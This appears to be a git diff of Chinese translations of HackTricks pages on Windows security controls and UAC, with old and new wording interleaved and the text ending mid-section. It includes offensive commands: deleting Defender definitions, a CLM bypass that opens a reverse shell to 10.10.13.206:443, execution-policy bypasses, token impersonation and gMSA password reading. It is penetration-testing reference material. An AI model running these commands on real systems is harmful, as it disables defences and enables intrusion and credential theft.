您也可以运行以下内容进行枚举
要枚举它,您还可以运行
```bash
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@ -120,73 +121,74 @@ sc query windefend
#Delete all rules of Defender (useful for machines without internet access)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```
## 加密文件系统EFS
## 加密文件系统 (EFS)
EFS通过加密来保护文件,利用称为**文件加密密钥FEK**的**对称密钥**。该密钥使用用户的**公钥**加密,并存储在加密文件的$EFS **备用数据流**中。需要解密时,用户的数字证书对应的**私钥**用于从$EFS流中解密FEK。更多详细信息可在[这里](https://en.wikipedia.org/wiki/Encrypting\_File\_System)找到。
EFS 通过加密保护文件,利用称为 **文件加密密钥 (FEK)****对称密钥**。该密钥使用用户的 **公钥** 进行加密,并存储在加密文件的 $EFS **替代数据流** 中。当需要解密时,使用用户数字证书的相应 **私钥** 从 $EFS 流中解密 FEK。更多细节可以在 [这里](https://en.wikipedia.org/wiki/Encrypting\_File\_System) 找到。
**无需用户启动的解密场景**包括:
**无需用户启动的解密场景** 包括:
- 当文件或文件夹移动到非EFS文件系统如[FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table))时,它们会自动解密。
- 通过SMB/CIFS协议发送的加密文件在传输之前会被解密。
* 当文件或文件夹被移动到非 EFS 文件系统(如 [FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table))时,它们会自动解密。
* 通过 SMB/CIFS 协议在网络上传输的加密文件在传输前会被解密。
这种加密方法允许所有者**透明访问**加密文件。然而,仅仅更改所有者的密码并登录将不允许解密。
这种加密方法允许所有者对加密文件进行 **透明访问**。然而,仅仅更改所有者的密码并登录并不能允许解密。
**要点**
**关键要点**
- EFS使用对称FEK使用用户的公钥加密。
- 解密使用用户的私钥访问FEK。
- 在特定条件下会自动解密如复制到FAT32或网络传输。
- 加密文件对所有者可访问,无需额外步骤。
* EFS 使用对称 FEK使用用户的公钥加密。
* 解密使用用户的私钥访问 FEK。
* 在特定条件下会自动解密,例如复制到 FAT32 或网络传输。
* 加密文件对所有者可访问,无需额外步骤。
### 检查EFS信息
### 检查 EFS 信息
检查**用户**是否**使用**了此**服务**,检查路径是否存在:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
检查 **用户** 是否 **使用** 了此 **服务**,检查路径是否存在:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
使用`cipher /c \<file\>`检查文件的**访问权限**。您还可以在文件夹中使用`cipher /e`和`cipher /d`来**加密**和**解密**所有文件。
使用 cipher /c \<file\> 检查 **谁****访问** 文件的权限\
您还可以在文件夹内使用 `cipher /e``cipher /d`**加密****解密** 所有文件
### 解密EFS文件
### 解密 EFS 文件
#### 成为权限系统
这种方式要**受害用户**在主机内运行一个**进程**。如果是这种情况,可以使用`meterpreter`会话模拟用户进程的令牌(`incognito`中的`impersonate_token`)。或者您可以直接`migrate`到用户的进程。
这种方式要**受害用户** 在主机内 **运行** 一个 **进程**。如果是这种情况,使用 `meterpreter` 会话,您可以模拟用户进程的令牌(`incognito` 中的 `impersonate_token`)。或者您可以直接 `migrate` 到用户的进程。
#### 知道用户密码
#### 知道用户密码
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
## 群组管理服务帐户gMSA
## 组管理服务账户 (gMSA)
微软开发了**群组管理服务帐户gMSA**以简化IT基础设施中服务帐户的管理。与通常启用“**密码永不过期**”设置的传统服务帐户不同gMSA提供了更安全和可管理的解决方案:
微软开发了 **组管理服务账户 (gMSA)** 以简化 IT 基础设施中服务账户的管理。与传统的服务账户(通常启用“**密码永不过期**”设置不同gMSA 提供了更安全和可管理的解决方案:
- **自动密码管理**gMSA使用一个复杂的、240字符的密码根据域或计算机策略自动更改。这个过程由微软的密钥分发服务KDC处理消除了手动密码更新的需要。
- **增强安全性**:这些帐户不会被锁定,也不能用于交互式登录,增强了安全性。
- **多主机支持**gMSA可以在多个主机之间共享非常适合在多台服务器上运行的服务。
- **定时任务功能**与托管服务帐户不同gMSA支持运行定时任务。
- **简化的SPN管理**当计算机的sAMaccount详细信息或DNS名称发生变化时系统会自动更新服务主体名称SPN简化了SPN管理。
* **自动密码管理**gMSA 使用复杂的 240 字符密码,自动根据域或计算机策略进行更改。此过程由微软的密钥分发服务 (KDC) 处理,消除了手动更新密码的需要。
* **增强安全性**:这些账户免受锁定,并且不能用于交互式登录,从而增强了安全性。
* **多主机支持**gMSA 可以在多个主机之间共享,非常适合在多个服务器上运行的服务。
* **计划任务能力**与管理服务账户不同gMSA 支持运行计划任务。
* **简化 SPN 管理**:当计算机的 sAMaccount 详细信息或 DNS 名称发生更改时,系统会自动更新服务主体名称 (SPN),简化 SPN 管理。
gMSA的密码存储在LDAP属性_**msDS-ManagedPassword**_中并且由域控制器DC每30天自动重置一次。这个密码是一个加密的数据块称为[MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e)只能由授权管理员和安装了gMSA的服务器检索确保安全环境。要访问这些信息需要一个安全连接如LDAPS或者连接必须经过“密封和安全”认证。
gMSA 的密码存储在 LDAP 属性 _**msDS-ManagedPassword**_ 中,并由域控制器 (DC) 每 30 天自动重置一次。此密码是一个加密数据块,称为 [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e),只能由授权管理员和安装 gMSA 的服务器检索,从而确保安全环境。要访问此信息,需要安全连接,例如 LDAPS或者连接必须经过“密封和安全”身份验证。
![https://cube0x0.github.io/Relaying-for-gMSA/](../../.gitbook/assets/asd1.png)
您可以使用[GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader)来读取这个密码。
您可以使用 [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)** 读取此密码:**
```
/GMSAPasswordReader --AccountName jkohler
```
[**在此帖子中找更多信息**](https://cube0x0.github.io/Relaying-for-gMSA/)
[**在此帖子中更多信息**](https://cube0x0.github.io/Relaying-for-gMSA/)
还可以查看有关如何执行**NTLM中继攻击**以**读取** **gMSA** **密码**的[网页](https://cube0x0.github.io/Relaying-for-gMSA/)。
此外,请查看此[网页](https://cube0x0.github.io/Relaying-for-gMSA/)关于如何执行**NTLM中继攻击**以**读取** **gMSA**的**密码**
## LAPS
**本地管理员密码解决方案LAPS**,可从[Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899)下载,可管理本地管理员密码。这些密码是**随机的**、独特的,并且**定期更改**存储在Active Directory中。通过ACL对授权用户进行限制可以提供读取本地管理员密码的能力
**本地管理员密码解决方案 (LAPS)**,可从[Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899)下载,允许管理本地管理员密码。这些密码是**随机生成**、唯一且**定期更改**的集中存储在Active Directory中。对这些密码的访问通过ACL限制为授权用户。授予足够的权限后可以读取本地管理员密码
{% content-ref url="../active-directory-methodology/laps.md" %}
[laps.md](../active-directory-methodology/laps.md)
{% endcontent-ref %}
## PS 受限语言模式
## PS受限语言模式
PowerShell [**受限语言模式**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **限制了许多**有效使用PowerShell所需的功能如阻止COM对象仅允许批准的.NET类型基于XAML的工作流程PowerShell类等。
PowerShell [**受限语言模式**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **锁定了许多有效使用PowerShell所需的功能**例如阻止COM对象仅允许批准的.NET类型、基于XAML的工作流、PowerShell类等。
### **检查**
```powershell
@ -198,10 +200,10 @@ $ExecutionContext.SessionState.LanguageMode
#Easy bypass
Powershell -version 2
```
在当前的Windows中绕过不起作用,但你可以使用[**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM)。\
**要编译它,您可能需要** **添加引用** -> _浏览_ ->_浏览_ -> 添加 `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` 并**将项目更改为 .Net4.5**。
在当前的Windows中绕过方法将不起作用,但您可以使用[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM)。\
**要编译它,您可能需要** **_添加引用_** -> _浏览_ -> _浏览_ -> 添加 `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` 并**将项目更改为 .Net4.5**。
#### 直接绕过:
#### 直接绕过
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
```
@ -209,11 +211,11 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
```
您可以使用[**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)或[**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)来在任何进程中执行Powershell代码并绕过受限模式。有关更多信息请查看[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
您可以使用 [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 来 **执行 Powershell** 代码在任何进程中并绕过受限模式。有关更多信息,请查看: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
## PS执行策略
## PS 执行策略
默认情况下设置为**restricted**。绕过此策略的主要方法:
默认情况下,它设置为 **restricted.** 绕过此策略的主要方法:
```powershell
1º Just copy and paste inside the interactive PS console
2º Read en Exec
@ -233,32 +235,32 @@ Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
```
更多内容请查看[这里](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
更多内容可以在 [这里](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) 找到。
## 安全支持提供程序接口SSPI
## 安全支持提供者接口 (SSPI)
是用于证用户的 API。
是用于证用户的 API。
SSPI 将负责找到两台想要通信的机器的适当协议。首选方法是 Kerberos。然后 SSPI 将协商将使用哪种认证协议这些认证协议称为安全支持提供程序SSP,以 DLL 的形式位于每台 Windows 机器内,且两台机器必须支持相同的协议才能通信。
SSPI 将负责为想要通信的两台机器找到合适的协议。首选的方法是 Kerberos。然后SSPI 将协商使用哪个身份验证协议,这些身份验证协议称为安全支持提供者 (SSP),以 DLL 的形式位于每台 Windows 机器内,且两台机器必须支持相同的协议才能进行通信。
### 主要 SSP
* **Kerberos**:首选
* %windir%\Windows\System32\kerberos.dll
* **NTLMv1****NTLMv2**:兼容性原因
* **NTLMv1****NTLMv2**出于兼容性原因
* %windir%\Windows\System32\msv1\_0.dll
* **Digest**Web 服务器和 LDAP密码以 MD5 哈希形式
* **Digest**Web 服务器和 LDAP密码以 MD5 哈希形式存在
* %windir%\Windows\System32\Wdigest.dll
* **Schannel**SSL 和 TLS
* %windir%\Windows\System32\Schannel.dll
* **Negotiate**:用于协商使用的协议Kerberos 或 NTLMKerberos 是默认的
* **Negotiate**用于协商使用的协议Kerberos 或 NTLM默认是 Kerberos
* %windir%\Windows\System32\lsasrv.dll
#### 协商可以提供多种方法或仅一种方法
#### 协商可以提供多种方法或仅提供一种。
## UAC - 用户户控制
## UAC - 用户户控制
[用户账户控制UAC](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一项功能,可为**提升的活动**启用**同意提示**
[用户帐户控制 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一个启用 **提升活动的同意提示** 的功能
{% content-ref url="uac-user-account-control.md" %}
[uac-user-account-control.md](uac-user-account-control.md)
@ -267,23 +269,24 @@ SSPI 将负责找到两台想要通信的机器的适当协议。首选方法是
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 可轻松构建和**自动化工作流程**,由全球**最先进**的社区工具提供支持。\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
***
{% hint style="success" %}
学习和实践 AWS 黑客攻击:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客攻击:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,29 +1,30 @@
# UAC - 用户账户控制
# UAC - 用户帐户控制
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## UAC
[用户账户控制UAC](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)是一项功能,它为**提升的活动启用了一个同意提示**。应用程序具有不同的`完整性`级别,具有**高级别**的程序可以执行**可能危及系统的任务**。当启用UAC时应用程序和任务始终以非管理员帐户的安全上下文下运行除非管理员明确授权这些应用程序/任务具有管理员级别访问系统的权限来运行。这是一个方便的功能,可保护管理员免受意外更改,但不被视为安全边界。
[用户帐户控制 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一个功能,允许 **提升活动的同意提示**。应用程序具有不同的 `integrity` 级别,具有 **高级别** 的程序可以执行 **可能危害系统** 的任务。当 UAC 启用时,应用程序和任务始终 **在非管理员帐户的安全上下文中运行**,除非管理员明确授权这些应用程序/任务以管理员级别访问系统进行运行。这是一个便利功能,可以保护管理员免受意外更改,但不被视为安全边界。
有关完整性级别的更多信息:
@ -31,104 +32,105 @@
[integrity-levels.md](../windows-local-privilege-escalation/integrity-levels.md)
{% endcontent-ref %}
UAC生效时管理员用户会获得2个令牌一个标准用户密钥用于作为普通级别执行常规操作另一个带有管理员权限
UAC 生效时,管理员用户会获得 2 个令牌:一个标准用户密钥,用于以常规级别执行常规操作,以及一个具有管理员权限的密钥
这个[页面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)深入讨论了UAC的工作原理包括登录过程、用户体验和UAC架构。管理员可以使用安全策略来配置UAC在本地级别上的工作方式使用secpol.msc或通过Active Directory域环境中的组策略对象GPO进行配置和推送。各种设置在[这里](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings)有详细讨论。有10个组策略设置可用于UAC。以下表格提供了额外的细节
此 [页面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 深入讨论了 UAC 的工作原理,包括登录过程、用户体验和 UAC 架构。管理员可以使用安全策略配置 UAC 在本地级别如何特定于其组织的工作(使用 secpol.msc或通过组策略对象 (GPO) 在 Active Directory 域环境中配置并推送。各种设置在 [这里](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings) 详细讨论。可以为 UAC 设置 10 个组策略设置。以下表格提供了更多详细信息
| 组策略设置 | 注册表 | 默认设置 |
| 组策略设置 | 注册表 | 默认设置 |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
| [用户账户控制:内置管理员帐户的管理员批准模式](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | Disabled |
| [用户账户控制允许UIAccess应用程序在不使用安全桌面的情况下提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | Disabled |
| [用户账户控制:管理员批准模式下管理员的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | Prompt for consent for non-Windows binaries |
| [用户账户控制:标准用户的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | Prompt for credentials on the secure desktop |
| [用户账户控制:检测应用程序安装并提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | Enabled (default for home) Disabled (default for enterprise) |
| [用户账户控制:仅提升已签名和验证的可执行文件](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | Disabled |
| [用户账户控制仅提升已安装在安全位置的UIAccess应用程序](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | Enabled |
| [用户账户控制:以管理员批准模式运行所有管理员](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | Enabled |
| [用户账户控制:在提示提升时切换到安全桌面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | Enabled |
| [用户账户控制:将文件和注册表写入失败虚拟化到每个用户位置](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | Enabled |
### UAC Bypass Theory
| [用户帐户控制:内置管理员帐户的管理员批准模式](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | 禁用 |
| [用户帐户控制:允许 UIAccess 应用程序在不使用安全桌面的情况下提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | 禁用 |
| [用户帐户控制:管理员在管理员批准模式下的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | 对非 Windows 二进制文件提示同意 |
| [用户帐户控制:标准用户的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | 在安全桌面上提示凭据 |
| [用户帐户控制:检测应用程序安装并提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | 启用(家庭版默认)禁用(企业版默认) |
| [用户帐户控制:仅提升已签名和验证的可执行文件](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | 禁用 |
| [用户帐户控制:仅提升安装在安全位置的 UIAccess 应用程序](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | 启用 |
| [用户帐户控制:所有管理员都在管理员批准模式下运行](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | 启用 |
| [用户帐户控制:在提示提升时切换到安全桌面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | 启用 |
| [用户帐户控制:将文件和注册表写入失败虚拟化到每用户位置](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | 启用 |
一些程序如果用户属于管理员组,则会自动**自动提升**权限。这些可执行文件在其 _**清单**_ 中具有 _**autoElevate**_ 选项,其值为 _**True**_。此二进制文件还必须由 Microsoft **签名**
### UAC 绕过理论
因此,为了**绕过** **UAC**(从**中等**完整性级别提升到高级),一些攻击者使用这种类型的二进制文件来**执行任意代码**,因为它将从**高级**完整性进程中执行
如果 **用户属于** **管理员组**,某些程序会 **自动提升**。这些二进制文件在其 _**清单**_ 中具有 _**autoElevate**_ 选项,值为 _**True**_。该二进制文件还必须 **由 Microsoft 签名**
您可以使用 Sysinternals 的 _sigcheck.exe_ 工具**检查**二进制文件的 _**清单**_。您还可以使用 _Process Explorer__Process Monitor_Sysinternals 的工具)**查看**进程的**完整性级别**
然后,为了 **绕过** **UAC**(从 **中等** 完整性级别 **提升到高**),一些攻击者使用这种二进制文件来 **执行任意代码**,因为它将从 **高完整性级别进程** 中执行
### Check UAC
您可以使用 Sysinternals 的工具 _**sigcheck.exe**_ 检查二进制文件的 _**清单**_。您可以使用 _Process Explorer__Process Monitor_(来自 Sysinternals查看进程的 **完整性级别**
要确认 UAC 是否已启用,请执行以下操作:
### 检查 UAC
要确认 UAC 是否启用,请执行:
```
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
```
如果是**`1`**则UAC已**激活**;如果是**`0`**或**不存在**则UAC为**未激活**
如果是 **`1`**,则 UAC **已激活**;如果是 **`0`** 或者 **不存在**,则 UAC **未激活**
然后,检查已配置的**哪个级别**
然后,检查 **配置的级别**
```
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
```
* 如果**`0`**,那么 UAC 不会提示(类似于 **禁用**
* 如果 **`1`**,管理员会被要求输入用户名和密码以使用高权限执行二进制文件(在安全桌面上)
* 如果 **`2`****始终通知我**),当管理员尝试以高权限执行某些内容时UAC 将始终要求管理员确认(在安全桌面上)
* 如果**`3`**,类似于 `1` 但不一定在安全桌面上
* 如果**`4`**,类似于 `2` 但不一定在安全桌面上
* 如果**`5`****默认**),它将要求管理员确认以以高权限运行非 Windows 二进制文件
* 如果 **`0`**,则 UAC 不会提示(如 **禁用**
* 如果 **`1`**管理员会被 **要求输入用户名和密码** 以高权限执行二进制文件(在安全桌面上)
* 如果 **`2`****始终通知我**),当管理员尝试以高权限执行某些操作时UAC 将始终要求确认(在安全桌面上)
* 如果 **`3`**,类似于 `1`但不一定在安全桌面上
* 如果 **`4`**,类似于 `2`但不一定在安全桌面上
* 如果 **`5`****默认**),它会要求管理员确认以高权限运行非 Windows 二进制文件
然后,您需要查看 **`LocalAccountTokenFilterPolicy`** 的值\
如果值为 **`0`**那么只有 **RID 500** 用户(内置管理员)能够在没有 UAC 的情况下执行 **管理员任务**,如果是 `1`**"Administrators"** 组内的所有帐户都可以执行这些任务。
如果值为 **`0`**则只有 **RID 500** 用户(**内置管理员**)能够在没有 UAC 的情况下执行 **管理员任务**,如果为 `1`,则 **“Administrators”** 组中的所有帐户都可以执行这些任务。
最后查看 **`FilterAdministratorToken`** 的值\
如果**`0`**(默认),**内置管理员帐户** 可以进行远程管理任务,如果是 **`1`**,内置管理员帐户 **不能**行远程管理任务,除非 `LocalAccountTokenFilterPolicy` 设置为 `1`
最后查看 **`FilterAdministratorToken`** 的值\
